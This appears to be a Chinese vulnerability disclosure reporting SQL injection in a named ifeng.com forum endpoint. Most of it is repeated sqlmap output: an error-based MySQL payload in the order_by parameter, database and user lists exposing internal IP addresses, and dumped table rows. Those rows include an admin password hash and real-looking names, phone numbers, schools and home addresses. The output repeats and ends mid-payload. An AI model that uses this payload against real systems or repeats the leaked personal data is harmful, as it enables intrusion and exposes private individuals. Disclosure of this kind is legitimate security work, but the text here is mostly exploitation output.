2014-05-05: 细节已通知厂商并且等待厂商处理中 2014-05-05: 厂商已经确认,细节仅向厂商公开 2014-05-15: 细节向核心白帽子及相关领域专家公开 2014-05-25: 细节向普通白帽子公开 2014-06-04: 细节向实习白帽子公开 2014-06-19: 细节向公众公开
sql注入怪物来了
注入地址:http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined单引号回车后报错,爆路径,于是丢到sqlmap中跑
之后就什么都有了首先是数据库列表
之后查看是否是dba
之后查看用户列表
完完全全的暴露了内网的ip和其他数据库地址剩下的看代码吧
sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---available databases [11]:[*] app_bbs[*] app_news[*] app_weather[*] apphistory_news[*] appmil_news[*] appsports_news[*] baike_health[*] baike_house[*] information_schema[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---database management system users [234]:[*] ''@'localhost'[*] 'B74wNuTbbx'@'10.11.2.89'[*] 'B74wNuTbbx'@'10.11.2.90'[*] 'B74wNuTbbx'@'10.13.2.134'[*] 'B74wNuTbbx'@'10.13.2.135'[*] 'B74wNuTbbx'@'10.13.2.176'[*] 'B74wNuTbbx'@'10.13.2.177'[*] 'B74wNuTbbx'@'220.181.67.192'[*] 'iadmin'@'211.151.61.77'[*] 'root'@'10.13.2.132'[*] 'root'@'10.13.2.134'[*] 'root'@'10.13.2.135'[*] 'root'@'10.13.2.176'[*] 'root'@'10.13.2.177'[*] 'root'@'127.0.0.1'[*] 'root'@'192.168.2.162'[*] 'root'@'192.168.2.167'[*] 'root'@'220.181.24.100'[*] 'root'@'220.181.24.166'[*] 'root'@'220.181.24.2'[*] 'root'@'220.181.67.192'[*] 'root'@'localhost'[*] 'zabbix'@'127.0.0.1'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---available databases [11]:[*] app_bbs[*] app_news[*] app_weather[*] apphistory_news[*] appmil_news[*] appsports_news[*] baike_health[*] baike_house[*] information_schema[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_bbs[1 table]+------+| dkjs |+------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: baike_house[32 tables]+-----------------------+| wiki_activation || wiki_advertisement || wiki_attachment || wiki_autosave || wiki_banned || wiki_blacklist || wiki_category || wiki_channel || wiki_comment || wiki_creditdetail || wiki_doc || wiki_docreference || wiki_edition || wiki_focus || wiki_friendlink || wiki_language || wiki_lock || wiki_plugin || wiki_pluginhook || wiki_pluginvar || wiki_pms || wiki_regular || wiki_regular_relation || wiki_regulargroup || wiki_session || wiki_setting || wiki_style || wiki_synonym || wiki_task || wiki_user || wiki_usergroup || wiki_word |+-----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---available databases [11]:[*] app_bbs[*] app_news[*] app_weather[*] apphistory_news[*] appmil_news[*] appsports_news[*] baike_health[*] baike_house[*] information_schema[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: baike_houseTable: wiki_user[22 columns]+------------+-----------------------+| Column | Type |+------------+-----------------------+| birthday | int(10) unsigned || checkup | int(10) unsigned || creates | mediumint(8) unsigned || credits | int(10) || edits | mediumint(8) unsigned || email | char(50) || gender | tinyint(1) || groupid | smallint(6) unsigned || image | varchar(255) || language | varchar(20) || lastip | char(15) || lasttime | int(10) unsigned || location | varchar(30) || password | char(32) || regip | char(15) || regtime | int(10) unsigned || signature | text || style | varchar(20) || timeoffset | varchar(20) || uid | mediumint(8) unsigned || username | char(15) || views | int(10) unsigned |+------------+-----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: baike_houseTable: wiki_user[10 entries]+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+| 1 | 4 | <blank> | default | 0 | 59 | <blank> | wuwei@ifeng.com | 0 | 220.181.24.2 | 1 | 1270174931 | 21 | 0 | 1270174967 | <blank> | house_admin | 0 | e10adc3949ba59abbe56e057f20f883e | zh | <blank> | 8 || 2 | 4 | <blank> | default | 2 | 171 | <blank> | <blank> | 0 | 220.181.67.192 | 1 | 0 | 41 | 1 | 1286971633 | <blank> | 冠缨豺郎 | 0 | <blank> | zh | <blank> | 8 || 3 | 2 | <blank> | default | 0 | 29 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | zhaoxiaoxiong | 0 | <blank> | zh | <blank> | 8 || 4 | 4 | <blank> | default | 44 | 825 | <blank> | <blank> | 0 | 220.181.67.192 | 1 | 0 | 264 | 23 | 1287390647 | <blank> | 漫巴 | 0 | <blank> | zh | <blank> | 8 || 5 | 8 | <blank> | default | 7 | 1140 | <blank> | <blank> | 0 | 220.181.24.2 | 1 | 0 | 663 | 124 | 1270429517 | <blank> | 西瓜妹 | 0 | <blank> | zh | <blank> | 8 || 6 | 2 | <blank> | default | 0 | 29 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | zhuantou | 0 | <blank> | zh | <blank> | 8 || 7 | 2 | <blank> | default | 0 | 30 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | c100 | 0 | <blank> | zh | <blank> | 8 || 8 | 8 | <blank> | default | 7 | 1183 | <blank> | <blank> | 0 | 220.181.24.2 | 1 | 0 | 794 | 150 | 1270959387 | <blank> | 金鱼77 | 0 | <blank> | zh | <blank> | 8 || 9 | 2 | <blank> | default | 0 | 31 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | qq15236958@sina | 0 | <blank> | zh | <blank> | 8 || 10 | 7 | <blank> | default | 0 | 793 | <blank> | <blank> | 0 | 220.181.24.2 | 1 | 0 | 533 | 102 | 1270545218 | <blank> | qq15236958 | 0 | <blank> | zh | <blank> | 8 |+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: baike_houseTable: wiki_user[11 entries]+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+| 100 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | yangganghong | 0 | <blank> | zh | <blank> | 8 || 101 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 肖张氏 | 0 | <blank> | zh | <blank> | 8 || 102 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | hanruikai | 0 | <blank> | zh | <blank> | 8 || 103 | 2 | <blank> | default | 0 | 7 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | cbgwllcjt | 0 | <blank> | zh | <blank> | 8 || 104 | 2 | <blank> | default | 0 | 4 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | gk777 | 0 | <blank> | zh | <blank> | 8 || 105 | 2 | <blank> | default | 0 | 4 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 品酸 | 0 | <blank> | zh | <blank> | 8 || 106 | 2 | <blank> | default | 0 | 3 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | daiyb | 0 | <blank> | zh | <blank> | 8 || 107 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 欧阳君山 | 0 | <blank> | zh | <blank> | 8 || 108 | 2 | <blank> | default | 0 | 3 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 小马不识途 | 0 | <blank> | zh | <blank> | 8 || 109 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | gxy891029 | 0 | <blank> | zh | <blank> | 8 || 110 | 2 | <blank> | default | 0 | 6 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 晓飞416329 | 0 | <blank> | zh | <blank> | 8 |+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---available databases [11]:[*] app_bbs[*] app_news[*] app_weather[*] apphistory_news[*] appmil_news[*] appsports_news[*] baike_health[*] baike_house[*] information_schema[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: baike_health[35 tables]+------------------------+| wiki_activation || wiki_advertisement || wiki_attachment || wiki_autosave || wiki_banned || wiki_blacklist || wiki_category || wiki_category_20100224 || wiki_channel || wiki_comment || wiki_creditdetail || wiki_doc || wiki_doc_20100224_20 || wiki_doc_temp_copy || wiki_docreference || wiki_edition || wiki_focus || wiki_friendlink || wiki_language || wiki_lock || wiki_plugin || wiki_pluginhook || wiki_pluginvar || wiki_pms || wiki_regular || wiki_regular_relation || wiki_regulargroup || wiki_session || wiki_setting || wiki_style || wiki_synonym || wiki_task || wiki_user || wiki_usergroup || wiki_word |+------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: baike_healthTable: wiki_user[11 entries]+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+| 100 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 新娘jiujiu | 0 | <blank> | zh | <blank> | 8 || 101 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 江湖一鸣 | 0 | <blank> | zh | <blank> | 8 || 102 | 2 | <blank> | default | 0 | 40 | <blank> | <blank> | 0 | 59.175.185.178 | 1 | 0 | 21 | 0 | 1267751010 | <blank> | erxy | 0 | <blank> | zh | <blank> | 8 || 103 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | fuf | 0 | <blank> | zh | <blank> | 8 || 104 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 墨侃 | 0 | <blank> | zh | <blank> | 8 || 105 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | maiky1987 | 0 | <blank> | zh | <blank> | 8 || 106 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | yantachenzhong | 0 | <blank> | zh | <blank> | 8 || 107 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | chen0928 | 0 | <blank> | zh | <blank> | 8 || 108 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 高老庄0560 | 0 | <blank> | zh | <blank> | 8 || 109 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | 为了国家的80后 | 0 | <blank> | zh | <blank> | 8 || 110 | 2 | <blank> | default | 0 | 0 | <blank> | <blank> | 0 | <blank> | 1 | 0 | 20 | 0 | 0 | <blank> | bxbglg123 | 0 | <blank> | zh | <blank> | 8 |+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---available databases [11]:[*] app_bbs[*] app_news[*] app_weather[*] apphistory_news[*] appmil_news[*] appsports_news[*] baike_health[*] baike_house[*] information_schema[*] mysql[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_bbs[1 table]+------+| dkjs |+------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---Database: app_bbsTable: dkjs[3 entries]+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+| id | city | name | story | phone | school | is_wap | photo3 | verify | photo2 | photo1 | address | province | submit_time |+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+| 122 | 南阳 | 李果 | 失业,多次评为优秀教师,模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0 | 4 | yes | 4 | 4 | 河南省邓州市穰东镇前庄村轩寺组 | 河南 | 2010-02-05 16:08:03 || 123 | <blank> | 晓清 | | 13017329166 | 某学校 | 0 | 4 | yes | 4 | 4 | 湖南 | 湖南 | 2010-02-05 16:14:31 || 124 | 梧州 | 郭伟民 | | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0 | 4 | yes | 4 | 4 | 岑溪市城中路20号 | 广西 | 2010-02-05 16:14:38 |+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_type=undefined---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: order_by Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined&order_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 